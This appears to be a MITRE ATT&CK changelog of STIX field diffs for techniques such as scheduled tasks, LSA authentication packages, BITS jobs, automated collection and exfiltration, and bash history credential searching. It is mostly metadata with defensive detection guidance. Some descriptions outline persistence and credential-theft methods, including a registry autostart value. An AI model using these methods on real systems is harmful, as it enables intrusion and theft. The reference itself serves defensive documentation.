| external_references[4]['source_name'] | Microsoft Scheduled Task Events Win10 | Twitter Leoloobeek Scheduled Task |
| external_references[4]['description'] | Microsoft. (2017, May 28). Audit Other Object Access Events. Retrieved June 27, 2019. | Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved December 12, 2017. |
| external_references[4]['url'] | https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events | https://twitter.com/leoloobeek/status/939248813465853953 |
| external_references[5]['source_name'] | TechNet Autoruns | Microsoft Scheduled Task Events Win10 |
| external_references[5]['description'] | Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016. | Microsoft. (2017, May 28). Audit Other Object Access Events. Retrieved June 27, 2019. |
| external_references[5]['url'] | https://technet.microsoft.com/en-us/sysinternals/bb963902 | https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events |
| x_mitre_data_sources[0] | Scheduled Job: Scheduled Job Creation | Process: Process Creation |
| x_mitre_data_sources[3] | Process: Process Creation | Scheduled Job: Scheduled Job Creation |
| x_mitre_detection | Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc. Configure event logging for scheduled task creation and changes by enabling the "Microsoft-Windows-TaskScheduler/Operational" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10) * Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered * Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated * Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted * Event ID 4698 on Windows 10, Server 2016 - Scheduled task created * Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled * Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns) Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data. | Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.
Configure event logging for scheduled task creation and changes by enabling the "Microsoft-Windows-TaskScheduler/Operational" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10)
* Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered
* Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated
* Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted
* Event ID 4698 on Windows 10, Server 2016 - Scheduled task created
* Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled
* Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.
In Linux and macOS environments, monitor scheduled task creation using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc.
Review all jobs using the atq command and ensure IP addresses stored in the SSH_CONNECTION and SSH_CLIENT variables, machines that created the jobs, are trusted hosts. All [at](https://attack.mitre.org/software/S0110) jobs are stored in /var/spool/cron/atjobs/.(Citation: rowland linux at 2019)
Suspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for [Command and Control](https://attack.mitre.org/tactics/TA0011), learning details about the environment through [Discovery](https://attack.mitre.org/tactics/TA0007), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008). |
| x_mitre_version | 1.0 | 2.0 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'TechNet Scheduled Task Events', 'description': 'Microsoft. (n.d.). General Task Registration. Retrieved December 12, 2017.', 'url': 'https://technet.microsoft.com/library/dd315590.aspx'} | |
| external_references | {'source_name': 'TechNet Autoruns', 'description': 'Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.', 'url': 'https://technet.microsoft.com/en-us/sysinternals/bb963902'} | |
| external_references | {'source_name': 'TechNet Forum Scheduled Task Operational Setting', 'description': 'Satyajit321. (2015, November 3). Scheduled Tasks History Retention settings. Retrieved December 12, 2017.', 'url': 'https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen'} | |
| x_mitre_permissions_required | User | |
| x_mitre_platforms | Linux | |
| x_mitre_platforms | macOS |
| Old Description | New Description |
|---|---|
Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system. (Citation: MSDN Authentication Packages) Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ with the key value of "Authentication Packages"=<target binary>. The binary will then be executed by the system when the authentication packages are loaded. |
Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ with the key value of "Authentication Packages"=<target binary>. The binary will then be executed by the system when the authentication packages are loaded. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-25 15:11:25.821000+00:00 | 2022-04-20 16:29:36.291000+00:00 |
| description | Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system. (Citation: MSDN Authentication Packages)
Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ with the key value of "Authentication Packages"=<target binary>. The binary will then be executed by the system when the authentication packages are loaded. |
Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ with the key value of "Authentication Packages"=<target binary>. The binary will then be executed by the system when the authentication packages are loaded. |
| external_references[1]['source_name'] | MSDN Authentication Packages | Graeber 2014 |
| external_references[1]['description'] | Microsoft. (n.d.). Authentication Packages. Retrieved March 1, 2017. | Graeber, M. (2014, October). Analysis of Malicious Security Support Provider DLLs. Retrieved March 1, 2017. |
| external_references[1]['url'] | https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx | http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html |
| external_references[2]['source_name'] | Graeber 2014 | Microsoft Configure LSA |
| external_references[2]['description'] | Graeber, M. (2014, October). Analysis of Malicious Security Support Provider DLLs. Retrieved March 1, 2017. | Microsoft. (2013, July 31). Configuring Additional LSA Protection. Retrieved June 24, 2015. |
| external_references[2]['url'] | http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html | https://technet.microsoft.com/en-us/library/dn408187.aspx |
| external_references[3]['source_name'] | Microsoft Configure LSA | MSDN Authentication Packages |
| external_references[3]['description'] | Microsoft. (2013, July 31). Configuring Additional LSA Protection. Retrieved June 24, 2015. | Microsoft. (n.d.). Authentication Packages. Retrieved March 1, 2017. |
| external_references[3]['url'] | https://technet.microsoft.com/en-us/library/dn408187.aspx | https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Command: Command Execution |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Command: Command Execution |
| Old Description | New Description |
|---|---|
| Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools. This technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files. | Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. In cloud-based environments, adversaries may also use cloud APIs, command line interfaces, or extract, transform, and load (ETL) services to automatically collect data. This functionality could also be built into remote access tools. This technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files, as well as [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538) and [Cloud Storage Object Discovery](https://attack.mitre.org/techniques/T1619) to identify resources in cloud environments. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Praetorian'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-31 22:18:43.019000+00:00 | 2022-04-11 18:40:24.795000+00:00 |
| description | Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools. This technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files. | Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. In cloud-based environments, adversaries may also use cloud APIs, command line interfaces, or extract, transform, and load (ETL) services to automatically collect data. This functionality could also be built into remote access tools. This technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files, as well as [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538) and [Cloud Storage Object Discovery](https://attack.mitre.org/techniques/T1619) to identify resources in cloud environments. |
| x_mitre_data_sources[0] | File: File Access | Script: Script Execution |
| x_mitre_data_sources[2] | Script: Script Execution | File: File Access |
| x_mitre_detection | Depending on the method used, actions could include common file system commands and parameters on the command-line interface within batch files or scripts. A sequence of actions like this may be unusual, depending on the system and network environment. Automated collection may occur along with other techniques such as [Data Staged](https://attack.mitre.org/techniques/T1074). As such, file access monitoring that shows an unusual process performing sequential file opens and potentially copy actions to another location on the file system for many files at once may indicate automated collection behavior. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). | Depending on the method used, actions could include common file system commands and parameters on the command-line interface within batch files or scripts. A sequence of actions like this may be unusual, depending on the system and network environment. Automated collection may occur along with other techniques such as [Data Staged](https://attack.mitre.org/techniques/T1074). As such, file access monitoring that shows an unusual process performing sequential file opens and potentially copy actions to another location on the file system for many files at once may indicate automated collection behavior. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), as well as through cloud APIs and command line interfaces. |
| x_mitre_system_requirements[0] | Permissions to access directories and files that store information of interest. | Permissions to access directories, files, and API endpoints that store information of interest. |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms | IaaS | |
| x_mitre_platforms | SaaS |
| Description |
|---|
| Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection. When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_network_requirements | True |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-08-16 15:23:38.940000+00:00 | 2022-04-19 22:50:14.956000+00:00 |
| x_mitre_data_sources[0] | Command: Command Execution | Network Traffic: Network Connection Creation |
| x_mitre_data_sources[1] | Script: Script Execution | Network Traffic: Network Traffic Content |
| x_mitre_data_sources[2] | Network Traffic: Network Connection Creation | Script: Script Execution |
| x_mitre_data_sources[3] | Network Traffic: Network Traffic Flow | File: File Access |
| x_mitre_data_sources[4] | Network Traffic: Network Traffic Content | Command: Command Execution |
| x_mitre_data_sources[5] | File: File Access | Network Traffic: Network Traffic Flow |
| Old Description | New Description |
|---|---|
| Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations. The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin) Adversaries may abuse BITS to download, execute, and even clean up after running malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware June 2016) BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016) | Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations. The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin) Adversaries may abuse BITS to download (e.g. [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)), execute, and even clean up after running malicious code (e.g. [Indicator Removal](https://attack.mitre.org/techniques/T1070)). BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware June 2016) BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User', 'Administrator', 'SYSTEM'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-13 21:36:04.956000+00:00 | 2022-09-14 19:21:26.447000+00:00 |
| description | Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations. The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin) Adversaries may abuse BITS to download, execute, and even clean up after running malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware June 2016) BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016) | Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations. The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin) Adversaries may abuse BITS to download (e.g. [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)), execute, and even clean up after running malicious code (e.g. [Indicator Removal](https://attack.mitre.org/techniques/T1070)). BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware June 2016) BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016) |
| external_references[1]['source_name'] | Microsoft COM | CTU BITS Malware June 2016 |
| external_references[1]['description'] | Microsoft. (n.d.). Component Object Model (COM). Retrieved November 22, 2017. | Counter Threat Unit Research Team. (2016, June 6). Malware Lingers with BITS. Retrieved January 12, 2018. |
| external_references[1]['url'] | https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx | https://www.secureworks.com/blog/malware-lingers-with-bits |
| external_references[2]['source_name'] | Microsoft BITS | Symantec BITS May 2007 |
| external_references[2]['description'] | Microsoft. (n.d.). Background Intelligent Transfer Service. Retrieved January 12, 2018. | Florio, E. (2007, May 9). Malware Update with Windows Update. Retrieved January 12, 2018. |
| external_references[2]['url'] | https://msdn.microsoft.com/library/windows/desktop/bb968799.aspx | https://www.symantec.com/connect/blogs/malware-update-windows-update |
| external_references[3]['source_name'] | Microsoft BITSAdmin | Elastic - Hunting for Persistence Part 1 |
| external_references[3]['description'] | Microsoft. (n.d.). BITSAdmin Tool. Retrieved January 12, 2018. | French, D., Murphy, B. (2020, March 24). Adversary tradecraft 101: Hunting for persistence using Elastic Security (Part 1). Retrieved December 21, 2020. |
| external_references[3]['url'] | https://msdn.microsoft.com/library/aa362813.aspx | https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-1 |
| external_references[4]['source_name'] | CTU BITS Malware June 2016 | PaloAlto UBoatRAT Nov 2017 |
| external_references[4]['description'] | Counter Threat Unit Research Team. (2016, June 6). Malware Lingers with BITS. Retrieved January 12, 2018. | Hayashi, K. (2017, November 28). UBoatRAT Navigates East Asia. Retrieved January 12, 2018. |
| external_references[4]['url'] | https://www.secureworks.com/blog/malware-lingers-with-bits | https://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/ |
| external_references[5]['source_name'] | Mondok Windows PiggyBack BITS May 2007 | Microsoft Issues with BITS July 2011 |
| external_references[5]['description'] | Mondok, M. (2007, May 11). Malware piggybacks on Windows’ Background Intelligent Transfer Service. Retrieved January 12, 2018. | Microsoft. (2011, July 19). Issues with BITS. Retrieved January 12, 2018. |
| external_references[5]['url'] | https://arstechnica.com/information-technology/2007/05/malware-piggybacks-on-windows-background-intelligent-transfer-service/ | https://technet.microsoft.com/library/dd939934.aspx |
| external_references[6]['source_name'] | Symantec BITS May 2007 | Microsoft BITS |
| external_references[6]['description'] | Florio, E. (2007, May 9). Malware Update with Windows Update. Retrieved January 12, 2018. | Microsoft. (n.d.). Background Intelligent Transfer Service. Retrieved January 12, 2018. |
| external_references[6]['url'] | https://www.symantec.com/connect/blogs/malware-update-windows-update | https://msdn.microsoft.com/library/windows/desktop/bb968799.aspx |
| external_references[7]['source_name'] | PaloAlto UBoatRAT Nov 2017 | Microsoft BITSAdmin |
| external_references[7]['description'] | Hayashi, K. (2017, November 28). UBoatRAT Navigates East Asia. Retrieved January 12, 2018. | Microsoft. (n.d.). BITSAdmin Tool. Retrieved January 12, 2018. |
| external_references[7]['url'] | https://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/ | https://msdn.microsoft.com/library/aa362813.aspx |
| external_references[8]['source_name'] | Microsoft Issues with BITS July 2011 | Microsoft COM |
| external_references[8]['description'] | Microsoft. (2011, July 19). Issues with BITS. Retrieved January 12, 2018. | Microsoft. (n.d.). Component Object Model (COM). Retrieved November 22, 2017. |
| external_references[8]['url'] | https://technet.microsoft.com/library/dd939934.aspx | https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx |
| external_references[9]['source_name'] | Elastic - Hunting for Persistence Part 1 | Mondok Windows PiggyBack BITS May 2007 |
| external_references[9]['description'] | French, D., Murphy, B. (2020, March 24). Adversary tradecraft 101: Hunting for persistence using Elastic Security (Part 1). Retrieved December 21, 2020. | Mondok, M. (2007, May 11). Malware piggybacks on Windows’ Background Intelligent Transfer Service. Retrieved January 12, 2018. |
| external_references[9]['url'] | https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-1 | https://arstechnica.com/information-technology/2007/05/malware-piggybacks-on-windows-background-intelligent-transfer-service/ |
| x_mitre_data_sources[1] | Network Traffic: Network Connection Creation | Service: Service Metadata |
| x_mitre_data_sources[2] | Service: Service Metadata | Network Traffic: Network Connection Creation |
| x_mitre_version | 1.2 | 1.3 |
| Old Description | New Description |
|---|---|
Adversaries may search the bash command history on compromised systems for insecurely stored credentials. Bash keeps track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to the user’s .bash_history file. For each user, this file resides at the same location: ~/.bash_history. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Attackers can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way) |
Adversaries may search the bash command history on compromised systems for insecurely stored credentials. Bash keeps track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to the user’s .bash_history file. For each user, this file resides at the same location: ~/.bash_history. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Adversaries can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-02-07 20:48:49.878000+00:00 | 2022-03-08 21:34:44.728000+00:00 |
| description | Adversaries may search the bash command history on compromised systems for insecurely stored credentials. Bash keeps track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to the user’s .bash_history file. For each user, this file resides at the same location: ~/.bash_history. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Attackers can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way) |
Adversaries may search the bash command history on compromised systems for insecurely stored credentials. Bash keeps track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to the user’s .bash_history file. For each user, this file resides at the same location: ~/.bash_history. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Adversaries can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way) |
| x_mitre_data_sources[0] | File: File Access | Command: Command Execution |
| x_mitre_data_sources[1] | Command: Command Execution | File: File Access |
| x_mitre_version | 1.0 | 1.1 |
| Old Description | New Description |
|---|---|
| Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel. Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges. | Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel. Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Langendorf, S. (2013, September 24). Windows Registry Persistence, Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018. | |
| external_references | CAPEC-564 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-564 | |
| external_references | Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016. |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-19 04:03:47.056000+00:00 | 2022-04-18 22:21:27.840000+00:00 |
